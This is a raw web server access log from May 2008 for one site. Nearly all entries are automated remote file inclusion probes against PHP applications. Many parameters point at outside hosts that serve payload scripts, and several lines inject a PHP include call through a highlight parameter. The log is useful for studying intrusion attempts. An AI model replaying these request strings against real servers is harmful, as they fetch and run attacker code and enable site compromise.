89.108.67.176 - - [06/May/2008:09:00:01 -0700] "GET /index.php?option=com_mtree&task=listalpha&http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:00:27 -0700] "GET /logs/access.log/index.php?pag=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.211.161.41 - - [06/May/2008:09:00:31 -0700] "GET /logs/phphtml.php?htmlclass_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.211.161.41 - - [06/May/2008:09:00:31 -0700] "GET /phphtml.php?htmlclass_path=http://users.volja.net/smrad/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:00:31 -0700] "GET /index.php?pag=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:00:33 -0700] "GET /logs/index.php?pag=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:09:00:54 -0700] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:00:58 -0700] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.27.53 - - [06/May/2008:09:00:59 -0700] "GET /logs/access_080303.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:09:01:08 -0700] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:01:12 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:01:15 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:01:17 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:01:17 -0700] "GET //admin/index.php?o=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:01:17 -0700] "GET /logs//admin/index.php?o=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:01:20 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:01:22 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.121.115.49 - - [06/May/2008:09:01:47 -0700] "GET /index1.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.47.92 - - [06/May/2008:09:03:12 -0700] "GET /logs/access_080110.log/htmltonuke.php?filnavn=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:03:12 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.47.92 - - [06/May/2008:09:03:13 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:03:39 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:09:03:40 -0700] "GET //modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:03:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.166.35.71 - - [06/May/2008:09:04:03 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.213.226.202 - - [06/May/2008:09:04:22 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.213.226.202 - - [06/May/2008:09:04:22 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.213.226.202 - - [06/May/2008:09:04:22 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:09:04:31 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:09:04:31 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:04:47 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:04:53 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:04:53 -0700] "GET /logs/access_071225.log/index.php?pag=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:04:58 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.51.146 - - [06/May/2008:09:04:59 -0700] "GET /logs/access.log//admin/index.php?o=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:05:30 -0700] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:05:31 -0700] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:05:34 -0700] "GET /logs//ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:09:05:38 -0700] "GET //ashnews.php?pathtoashnews=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:09:05:39 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.44.68 - - [06/May/2008:09:05:40 -0700] "GET /errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.110.89 - - [06/May/2008:09:06:02 -0700] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [06/May/2008:09:06:02 -0700] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [06/May/2008:09:06:02 -0700] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:06:35 -0700] "GET /logs/access_080131.log/ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:06:36 -0700] "GET /ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:06:36 -0700] "GET /logs/ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [06/May/2008:09:06:43 -0700] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:09:06:52 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:09:06:52 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.115.110.89 - - [06/May/2008:09:07:04 -0700] "GET /logs/access_080312.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:09:07:07 -0700] "GET /logs//sub.php?s=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:09:07:08 -0700] "GET //sub.php?s=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:12 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:15 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:07:20 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [06/May/2008:09:07:20 -0700] "GET //Neos_Chronos/header.php?base_folder=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:24 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:26 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:07:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.210.31.3 - - [06/May/2008:09:07:27 -0700] "GET /logs/access_080229.log/ndex2.php?x=http://mashhur.uz/modules/Board/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:09:07:42 -0700] "GET /index.php?pag=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.11.230 - - [06/May/2008:09:08:09 -0700] "GET /logs/access_080328.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:09:19 -0700] "GET /logs/index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:09:19 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:09:09:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [06/May/2008:09:09:25 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.113.84.144 - - [06/May/2008:09:09:31 -0700] "GET /logs/access_080215.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:09:47 -0700] "GET /index2.php?option=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:09:47 -0700] "GET /logs/index2.php?option=http://www.rotary-canelli-nizza.org/r0x.id.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:09:52 -0700] "GET /logs/index.php?ort=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:09:52 -0700] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:09:09:56 -0700] "GET /index.php?ort=http://galee.freetzi.com/new.gif? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:09:09:58 -0700] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:09 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:15 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:09:10:24 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:10:50 -0700] "GET /logs/access_080313.log/calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:10:51 -0700] "GET /calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [06/May/2008:09:10:51 -0700] "GET /logs/calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.34.200.250 - - [06/May/2008:09:10:51 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.gamesmaniastaff.altervista.org/php5/fafsdf/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [06/May/2008:09:10:55 -0700] "GET /////?mosConfig_absolute_path=http://www.gamesmaniastaff.altervista.org/php5/fafsdf/text.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
64.34.200.250 - - [06/May/2008:09:10:56 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.gamesmaniastaff.altervista.org/php5/fafsdf/text.txt? HTTP/1.1" 200 46277 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:11:00 -0700] "GET /logs/index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:11:00 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.236.5.128 - - [06/May/2008:09:11:31 -0700] "GET /logs/access_080213.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.236.5.128 - - [06/May/2008:09:11:32 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.236.5.128 - - [06/May/2008:09:11:32 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:11:34 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.55.148.27 - - [06/May/2008:09:11:35 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:09:11:37 -0700] "GET /main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:11:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:11:46 -0700] "GET /logs/index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:09:11:46 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.35.158.180 - - [06/May/2008:09:11:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:01 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:01 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:09:12:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:12:19 -0700] "GET /logs/phphtml.php?htmlclass_path=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [06/May/2008:09:12:19 -0700] "GET /phphtml.php?htmlclass_path=http://insidelist.altervista.org/includes/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.149.215 - - [06/May/2008:09:12:39 -0700] "GET /index1.php?choix=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:12:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:12:40 -0700] "GET /logs/index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:09:12:40 -0700] "GET /index1.php?choix=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [06/May/2008:09:12:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://peteburton.com/guestbook/list/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:12:47 -0700] "GET //encapscms_PATH/core/core.php?root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.229.167 - - [06/May/2008:09:13:06 -0700] "GET /logs/access_080223.log//encapscms_PATH/core/core.php?root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
